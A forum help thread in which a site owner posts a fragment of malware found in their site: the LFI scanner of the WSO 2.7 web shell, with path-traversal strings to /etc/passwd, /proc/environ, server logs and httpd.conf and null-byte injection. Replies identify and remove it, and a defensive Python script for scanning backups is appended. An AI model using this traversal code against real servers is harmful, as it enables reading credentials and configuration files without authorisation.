                Access Log
             </option>
    
             <option value="2">
                httpd.conf
             </option>
    
             <option value="3">
                Error Log
             </option>
             <option value="4">
                php.ini
             </option>
             <option value="5">
                MySQL
             </option>
             <option value="6">
                FTP
             </option>
             <option value="7">
                Environ
             </option>
          </select> Null: <select name="null">
             <option value="%00">
                Yes
             </option>
    
             <option value="">
                No
             </option>
          </select> User-Agent: <input type="text" size="20" name="custom_header" value="">
       </form>';
       error_reporting(0);
          if($_POST['lfiurl']) {
             print "<pre>";
             $cheader = $_POST['custom_header'];
             $target = $_POST['lfiurl'];
             $type = $_POST['scantype'];
             $byte1 = $_POST['null'];
             $lfitest = "../../../../../../../../../../../../../../etc/passwd".$byte1."";
             $lfitest2 = "../../../../../../../../../../../../../../fake/file".$byte1."";
             $lfiprocenv = "../../../../../../../../../../../../../../proc/environ".$byte1."";
             $lfiaccess = array(
                1 => "../../../../../../../../../../../../../../apache/logs/access.log".$byte1."",
                2 => "../../../../../../../../../../../../../../etc/httpd/logs/acces_log".$byte1."",
                3 => "../../../../../../../../../../../../../../etc/httpd/logs/acces.log".$byte1."",
                4 => "../../../../../../../../../../../../../../var/www/logs/access_log".$byte1."",
                5 => "../../../../../../../../../../../../../../var/www/logs/access.log".$byte1."",
                6 => "../../../../../../../../../../../../../../usr/local/apache/logs/access_log".$byte1."",
                7 => "../../../../../../../../../../../../../../usr/local/apache/logs/access.log".$byte1."",
                8 => "../../../../../../../../../../../../../../var/log/apache/access_log".$byte1."",
                9 => "../../../../../../../../../../../../../../var/log/apache2/access_log".$byte1."",
                10 => "../../../../../../../../../../../../../../var/log/apache/access.log".$byte1."",
                11 => "../../../../../../../../../../../../../../var/log/apache2/access.log".$byte1."",
                12 => "../../../../../../../../../../../../../../var/log/access_log".$byte1."",
                13 => "../../../../../../../../../../../../../../var/log/access.log".$byte1."",
                14 => "../../../../../../../../../../../../../../var/log/httpd/access_log".$byte1."",
                15 => "../../../../../../../../../../../../../../apache2/logs/access.log".$byte1."",
                16 => "../../../../../../../../../../../../../../logs/access.log".$byte1."",
                17 => "../../../../../../../../../../../../../../usr/local/apache2/logs/access_log".$byte1."",
                18 => "../../../../../../../../../../../../../../usr/local/apache2/logs/access.log".$byte1."",
                19 => "../../../../../../../../../../../../../../var/log/httpd/access.log".$byte1."",
                20 => "../../../../../../../../../../../../../../opt/lampp/logs/access_log".$byte1."",
                21 => "../../../../../../../../../../../../../../opt/xampp/logs/access_log".$byte1."",
                22 => "../../../../../../../../../../../../../../opt/lampp/logs/access.log".$byte1."",
                23 => "../../../../../../../../../../../../../../opt/xampp/logs/access.log".$byte1."");
    
             $lfierror = array(
                1 => "../../../../../../../../../../../../../../apache/logs/error.log".$byte1."",
                2 => "../../../../../../../../../../../../../../etc/httpd/logs/error_log".$byte1."",
                3 => "../../../../../../../../../../../../../../etc/httpd/logs/error.log".$byte1."",
                4 => "../../../../../../../../../../../../../../var/www/logs/error_log".$byte1."",
                5 => "../../../../../../../../../../../../../../var/www/logs/error.log".$byte1."",
                6 => "../../../../../../../../../../../../../../usr/local/apache/logs/error_log".$byte1."",
                7 => "../../../../../../../../../../../../../../usr/local/apache/logs/error.log".$byte1."",
                8 => "../../../../../../../../../../../../../../var/log/apache/error_log".$byte1."",
                9 => "../../../../../../../../../../../../../../var/log/apache2/error_log".$byte1."",
                10 => "../../../../../../../../../../../../../../var/log/apache/error.log".$byte1."",
                11 => "../../../../../../../../../../../../../../var/log/apache2/error.log".$byte1."",
                12 => "../../../../../../../../../../../../../../var/log/error_log".$byte1."",
                13 => "../../../../../../../../../../../../../../var/log/error.log".$byte1."",
                14 => "../../../../../../../../../../../../../../var/log/httpd/error_log".$byte1."",
                15 => "../../../../../../../../../../../../../../apache2/logs/error.log".$byte1."",
                16 => "../../../../../../../../../../../../../../logs/error.log".$byte1."",
                17 => "../../../../../../../../../../../../../../usr/local/apache2/logs/error_log".$byte1."",
                18 => "../../../../../../../../../../../../../../usr/local/apache2/logs/error.log".$byte1."",
                19 => "../../../../../../../../../../../../../../var/log/httpd/error.log".$byte1."",
                20 => "../../../../../../../../../../../../../../opt/lampp/logs/error_log".$byte1."",
                21 => "../../../../../../../../../../../../../../opt/xampp/logs/error_log".$byte1."",
                22 => "../../../../../../../../../../../../../../opt/lampp/logs/error.log".$byte1."",
                23 => "../../../../../../../../../../../../../../opt/xampp/logs/error.log".$byte1."");
    
             $lficonfig = array(
                1 => "../../../../../../../../../../../../../../../usr/local/apache/conf/httpd.conf".$byte1."",
                2 => "../../../../../../../../../../../../../../../usr/local/apache2/conf/httpd.conf".$byte1."",
                3 => "../../../../../../../../../../../../../../../etc/httpd/conf/httpd.conf".$byte1."",
                4 => "../../../../../../../../../../../../../../../etc/apache/conf/httpd.conf".$byte1."",
                5 => "../../../../../../../../../../../../../../.

    If anyone can help, I would be very grateful.

Viewing 7 replies - 1 through 7 (of 7 total)
  • What's there to look for? It introduces itself:

    /* WSO 2.7 (404 Error Web Shell by Madleets.com) */

    And in general, take the original of your theme and compare the files line by line.

    Thanks for replying. Unfortunately, I don't have that option, because the site came to me already infected and there are no clean sources 🙁

    Well then, delete everything from that line to the end of the file.

    I can see it in the page source, but I can't find it in the theme files..(

    Now that's trouble

    I'm searching with Total Commander: Tools, file search, find files containing text. It doesn't find a single file in the whole backup, with any variable from this code.

    fixed
    The database file had been edited
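
The thread ends with the finding that the database file had been edited, after a text search of the backup for the code's variables found nothing. As an added example (not code from the thread), this Python script searches every file in a backup, gzip-compressed dumps included, for identifiers visible in the posted shell source; the file names and SQL rows built in `demo()` are constructed assumptions.

```python
import gzip
import re
import tempfile
import zlib
from pathlib import Path

# Identifiers copied from the shell source posted in this thread.
MARKERS = [b"wsoSecParam", b"wsoWhich", b"wsoEx", b"wsoHeader", b"wsoFooter",
           b"actionlfiscan", b"WSO 2.7"]
PATTERN = re.compile(b"|".join(re.escape(m) for m in MARKERS))


def read_maybe_gzip(path):
    """Return file bytes, decompressing gzip (e.g. a .sql.gz dump) on the fly."""
    data = Path(path).read_bytes()
    return gzip.decompress(data) if data[:2] == b"\x1f\x8b" else data


def scan_bytes(data):
    """Return sorted (line_number, marker) pairs for every marker found."""
    hits = set()
    for lineno, line in enumerate(data.split(b"\n"), start=1):
        hits.update((lineno, m.group().decode()) for m in PATTERN.finditer(line))
    return sorted(hits)


def scan_tree(root):
    """Scan every file under root, whatever its extension: {relative path: hits}."""
    report = {}
    for path in sorted(Path(root).rglob("*")):
        if not path.is_file():
            continue
        try:
            hits = scan_bytes(read_maybe_gzip(path))
        except (OSError, EOFError, zlib.error):
            continue  # unreadable file or corrupt archive: keep scanning
        if hits:
            report[path.relative_to(root).as_posix()] = hits
    return report


def demo():
    """Build a constructed backup (clean theme file, gzipped dump) and scan it."""
    dump = (b"INSERT INTO wp_options VALUES (1,'x','ok');\n"  # constructed rows
            b"INSERT INTO wp_options VALUES (2,'y','wsoSecParam(wsoEx());');\n")
    with tempfile.TemporaryDirectory() as tmp:
        (Path(tmp) / "footer.php").write_bytes(b"<?php wp_footer(); ?>\n")
        (Path(tmp) / "db.sql.gz").write_bytes(gzip.compress(dump))
        return scan_tree(tmp)
```

Matches depend on the code being stored as plain text; a copy stored in encoded form (for example base64) will not contain these identifiers.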

  • The topic "Can't find a virus on the site" is closed to new replies.